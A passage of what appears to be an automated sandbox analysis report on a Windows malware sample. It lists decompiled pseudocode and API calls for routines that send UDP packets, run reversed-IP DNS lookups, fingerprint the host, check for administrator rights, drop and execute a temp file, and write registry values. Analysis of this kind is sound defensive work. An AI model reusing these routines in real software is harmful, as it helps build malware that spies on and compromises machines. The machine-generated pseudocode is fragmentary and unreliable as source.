lstrcmpA.KERNEL32(73B743E8,00000000,?,73B743E0,00000000,?,00405EC1), ref: 0040E693
lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,73B743E0,00000000,?,00405EC1), ref: 0040E6E9
lstrcmpA.KERNEL32(?,00000008,?,73B743E0,00000000,?,00405EC1), ref: 0040E722

Strings

A, xrefs: 0040E65F, 0040E666, 0040E6CF, 0040E731
A, xrefs: 0040E6F9, 0040E6FE, 0040E739

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
String ID: A$ A
API String ID: 3343386518-686259309
Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004026FF, Relevance: 7.6, APIs: 5, Instructions: 96
networkCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400);
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

APIs

GetTickCount.KERNEL32 ref: 0040272E
htons.WS2_32(00000001), ref: 00402752
htons.WS2_32(0000000F), ref: 004027D5
htons.WS2_32(00000001), ref: 004027E3
sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802

Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: htons$Heap$AllocCountProcessTicksendto
String ID:
API String ID: 1802437671-0
Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718

Uniqueness

Uniqueness Score: -1.00%

Function 0040F26D, Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00409145, Relevance: 7.6, APIs: 5, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}

0x00409145
0x00409166
0x00409174
0x0040917a
0x00409180
0x00409181
0x004091a9
0x004091b6
0x004091c9
0x004091d3
0x00000000
0x004091e1
0x004091ea

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
CharToOemA.USER32 ref: 00409174
wsprintfA.USER32 ref: 004091A9

Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
String ID:
API String ID: 3857584221-0
Opcode ID: f6aed4ccaae47c7b42f07b5ef4a98d75cdec17ec76c22536cb1b197f5410ce84
Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
Opcode Fuzzy Hash: f6aed4ccaae47c7b42f07b5ef4a98d75cdec17ec76c22536cb1b197f5410ce84
Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68

Uniqueness

Uniqueness Score: -1.00%

Function 02169395, Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 021693AF
GetModuleFileNameA.KERNEL32(00000000), ref: 021693B6
CharToOemA.USER32(?,?), ref: 021693C4
wsprintfA.USER32 ref: 021693F9

Part of subcall function 021692B4: GetTempPathA.KERNEL32(00000400,?), ref: 021692CB
Part of subcall function 021692B4: wsprintfA.USER32 ref: 02169339
Part of subcall function 021692B4: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0216935E
Part of subcall function 021692B4: lstrlen.KERNEL32(?,?,00000000), ref: 02169372
Part of subcall function 021692B4: WriteFile.KERNEL32(00000000,?,00000000), ref: 0216937D
Part of subcall function 021692B4: CloseHandle.KERNEL32(00000000), ref: 02169384

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02169431

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
String ID:
API String ID: 3857584221-0
Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
Instruction ID: f6e60cb5bcbbb457fc8be7e25d1b7733347ffc5ad5af85cb6d1c868bb2df210a
Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
Instruction Fuzzy Hash: 5B0129B6940118BBDB21A7619D8DEEF3A7C9B95701F0040A2BB49E2080EBB496C58F65

Uniqueness

Uniqueness Score: -1.00%

Function 00402419, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}

APIs

lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467

Strings

localcfg, xrefs: 0040241F

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$lstrcmpi
String ID: localcfg
API String ID: 1808961391-1857712256
Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}

APIs

LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,?,?,?,00000001), ref: 00401AE9

Strings

GetAdaptersAddresses, xrefs: 00401AE3
Iphlpapi.dll, xrefs: 00401ACC

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetAdaptersAddresses$Iphlpapi.dll
API String ID: 2574300362-1087626847
Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,?,?,?,00000001), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401C15
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51

Strings

hi_id, xrefs: 00401BE5
localcfg, xrefs: 00401BE7

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: hi_id$localcfg
API String ID: 2777991786-2393279970
Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5

Uniqueness

Uniqueness Score: -1.00%

Function 00406EDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0xffffffff
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0xffffffff
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
FreeSid.ADVAPI32(?), ref: 00406F3E

Strings

*p@, xrefs: 00406F1C, 00406F1F

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID: *p@
API String ID: 3429775523-2474123842
Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00402684, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000001), ref: 00402693
gethostbyname.WS2_32(00000001), ref: 0040269F

Strings

time_cfg, xrefs: 00402684
~s`ysps, xrefs: 00402693

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$~s`ysps
API String ID: 1594361348-2010419113
Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688

Uniqueness

Uniqueness Score: -1.00%

Function 021628D4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(u6A), ref: 021628E3
gethostbyname.WS2_32(u6A), ref: 021628EF

Strings

u6A, xrefs: 021628D5, 021628E2, 021628EE
time_cfg, xrefs: 021628D4

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$u6A
API String ID: 1594361348-1940331995
Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction ID: a82c372679505a2bb38800d8c18721aecd7fb744d5875cf27fdd7da6367e490a
Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction Fuzzy Hash: F5E082306040219FCB108B28FC48BEA77E8AF4A230F1085A4F884C32A0C338ACC19B84

Uniqueness

Uniqueness Score: -1.00%

Function 0216D7B9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 7sleepCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0216D7BC
Sleep.KERNEL32(000003E8), ref: 0216D7C7
ExitProcess.KERNEL32 ref: 0216D7D3

Strings

ps, xrefs: 0216D7BC

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ExitProcessSleepclosesocket
String ID: ps
API String ID: 2012141568-3878219058
Opcode ID: a6f9f776857f4ecde53a678587fdf16408cfdffbb3d2d617deb71ab51d0e9a11
Instruction ID: b4176676d82963a288f2b4098df4d201f02c72d404d7cc7369cc24b00672e0b1
Opcode Fuzzy Hash: a6f9f776857f4ecde53a678587fdf16408cfdffbb3d2d617deb71ab51d0e9a11
Instruction Fuzzy Hash: 06C04C34441208DFD7412B64FC4CD8C3F65AB04302710C160A10690070CBB005508E29

Uniqueness

Uniqueness Score: -1.00%

Function 021669AC, Relevance: 6.2, APIs: 4, Instructions: 199COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(?,00000080), ref: 021669CE
SetFileAttributesA.KERNEL32(?,00000002), ref: 02166A0F
GetFileSize.KERNEL32(000000FF,00000000), ref: 02166A23
CloseHandle.KERNEL32(000000FF), ref: 02166BC1

Part of subcall function 0216EE7E: GetProcessHeap.KERNEL32(00000000,?,00000000,02161DB8,?), ref: 0216EE91
Part of subcall function 0216EE7E: HeapFree.KERNEL32(00000000), ref: 0216EE98

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: File$AttributesHeap$CloseFreeHandleProcessSize
String ID:
API String ID: 3384756699-0
Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
Instruction ID: 4d3b4526fa2e0e12d920796f8beb72ae13153f3feb75f8753383f4d4b6aa8d2d
Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
Instruction Fuzzy Hash: 40711A7194015EEFDF208FA4CC84AFEBBB9FB04354F1045AAE515A6190D7349E92CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00401C5F, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}

APIs

wsprintfA.USER32 ref: 00401CE1
wsprintfA.USER32 ref: 00401D6B

Strings

%u.%u.%u.%u.%s, xrefs: 00401CDB, 00401D65
localcfg, xrefs: 00401C70

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf
String ID: %u.%u.%u.%u.%s$localcfg
API String ID: 2111968516-120809033
Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E095, Relevance: 6.1, APIs: 4, Instructions: 92
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
